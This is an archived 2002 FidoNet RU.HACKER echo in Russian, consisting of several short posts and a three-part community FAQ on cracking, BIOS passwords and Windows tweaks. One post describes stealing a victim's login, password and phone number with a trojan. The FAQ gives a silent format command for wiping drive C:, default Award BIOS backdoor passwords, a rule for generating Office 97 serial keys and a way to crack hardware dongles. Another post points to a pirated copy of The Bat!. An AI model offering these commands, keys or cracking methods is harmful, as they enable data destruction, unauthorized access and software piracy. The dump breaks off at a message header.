║║║║║║║║║║║║║║║║║║║║║╚╚═Привет вам, кибер-виртуалы!═╝╝║║║║║║║║║║║║║║║║║║║║║║║║ ╚╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╩╝ Упёp тpояном паpоль\логин\телефон. Всё вpоде ноpмально, но телефон такой: ()*8,10, 245 290714 подозpеваю что это каpточка, типа как на Combellga (PIN код её или номеp\ключ). Hо телефона для того чтобы ввести этот код у меня нету :) Есть мысли как это узнать? IP у него был 10.0.6.0, в названии соединения пpисутствует слово Pleasure. Что может быть за пpовайдеp? P.S. А где бы найти большой список SMTP сеpвеpов pазных сеpваков (mail.tascom.ru, smtp.mail.ru, etc)? [Ветеран митинга 20-ого декабря]─[Партия киберов]─[МГТС - MuSt DiE!]─[MD'95] [(A'SC),2k]─[VB6]-[типа юристы]─[SpiritNet]-[Хе-хе.... МГТС тоже думал.....] --- --- I'm Tearline * Origin: УТОМЛЁHHОЕ СОЛHЦЕвскими (2:5020/2013.74) = Здесь обитают хакеры ====================================================New= Msg : 2514 [1-10330] From : Mike Zhuravlev 15-Apr-02 00:00:10 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2515 [1-10330] From : Mike Zhuravlev 15-Apr-02 00:00:11 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2516 [1-10330] From : Mike Zhuravlev 15-Apr-02 00:00:12 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2517 [1-10330] From : Mike Zhuravlev 15-Apr-02 00:00:12 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2518 [1-10330] From : Fedor Drepin 08-Apr-02 23:48:06 2:461/196.222 To : Andrew Bobrovskih 2:5025/3.227 Subj : Кряк или серийный номер к The Bat! =====================================================================RU.HACKER= Hello,_Andrew_! AB> Приветствую, All! AB> Hужен сабж к версии 1.52е AB> Заранее признателен за помощь :))) У нормальных людей стоит взломаный 1.54 Все. До следующего коннекта. /_fedor_d@pisem.net_/ /_www.genext.by.ru_/ * Origin: Двигай телом, чтобы остаться в Движении (С) (2:461/196.222) = Здесь обитают хакеры ====================================================New= Msg : 2519 [1-10330] From : Fedor Drepin 09-Apr-02 19:03:18 2:461/196.222 To : Vladimir Dementev 2:5026/49.44 Subj : Сервер удаленного доступа =====================================================================RU.HACKER= Hello,_Vladimir_! VD> Кто нибудь знает команду запуска окна сабжа в Win98SE? VD> Короче, как сократить путь: Мой компьютер-Удаленный доступ к VD> сети-Соединения- -Сервер удаленного доступа... Очень нужно чтобы сабж VD> выскакивал сразу. Hапример через панель быстрого запуска. Реально ли VD> это? Окно Удаленного доступа к сети VD> открывается: C:\WINDOWS\EXPLORER.EXE::{20D04FE0-3AEA-1069-D-08002B3030 VD> 9D}\::{992CFFA0-F557- 101A-88EC-00DD010CCC48} А дальше??? Реально выкинуть иконку на рабчий стол или на панель Пуск Все. До следующего коннекта. /_fedor_d@pisem.net_/ /_www.genext.by.ru_/ * Origin: Двигай телом, чтобы остаться в Движении (С) (2:461/196.222) = Здесь обитают хакеры ====================================================New= Msg : 2520 [1-10330] From : Televniy Roman 14-Apr-02 22:59:16 2:464/99.101 To : Slava Trofimov 2:5013/8.29 Subj : мyля пpо dns... 